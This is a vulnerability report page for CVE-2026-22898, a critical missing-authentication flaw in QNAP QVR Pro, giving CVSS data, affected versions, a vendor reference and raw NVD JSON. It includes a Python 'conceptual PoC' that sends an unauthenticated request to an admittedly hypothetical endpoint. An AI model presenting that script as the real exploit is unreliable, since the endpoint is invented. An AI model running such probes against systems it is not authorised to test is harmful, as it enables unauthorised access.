Security Vulnerability Report
CVE-2026-22898 CVSS 9.8 CRITICAL

Published: 2026-03-20 17:16:44
Last Modified: 2026-04-14 14:33:30

Description

A missing authentication for critical function vulnerability has been reported to affect QVR Pro. Remote attackers can then exploit the vulnerability to gain access to the system.

We have already fixed the vulnerability in the following version: QVR Pro 2.7.4.14 and later.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qvr_pro:*:*:*:*:*:*:*:* - VULNERABLE
QVR Pro < 2.7.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_vulnerability(target_url):
    """
    Conceptual PoC for Missing Authentication Vulnerability.
    Attempts to access a protected endpoint without credentials.
    """
    # Hypothetical endpoint that requires auth but is missing it
    vulnerable_endpoint = "/api/v1/system/config"
    full_url = f"{target_url}{vulnerable_endpoint}"

    headers = {
        "User-Agent": "Vulnerability-Scanner/1.0",
        "Accept": "application/json"
    }

    try:
        # Sending request without Authorization header
        response = requests.get(full_url, headers=headers, timeout=10)

        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected at {target_url}")
            print(f"[+] Response: {response.text[:100]}...")
        else:
            print(f"[-] Target does not appear vulnerable (Status: {response.status_code})")

    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    target = "http://192.168.1.10:8080"  # Replace with actual target IP
    check_vulnerability(target)

References

https://www.qnap.com/en/security-advisory/qsa-26-07 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22898", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:44.307", "lastModified": "2026-04-14T14:33:30.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing authentication for critical function vulnerability has been reported to affect QVR Pro. The remote attackers can then exploit the vulnerability to gain access to the system.\n\nWe have already fixed the vulnerability in the following version:\nQVR Pro 2.7.4.14 and later"}, {"lang": "es", "value": "Se ha reportado una vulnerabilidad de autenticación ausente para función crítica que afecta a QVR Pro. Los atacantes remotos pueden entonces explotar la vulnerabilidad para obtener acceso al sistema.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQVR Pro 2.7.4.14 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qvr_pro:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.7.1.1259", "versionEndExcluding": "2.7.4.1485", "matchCriteriaId": "73876E44-976A-4A41-8176-B28F3D39ED43"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-07", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}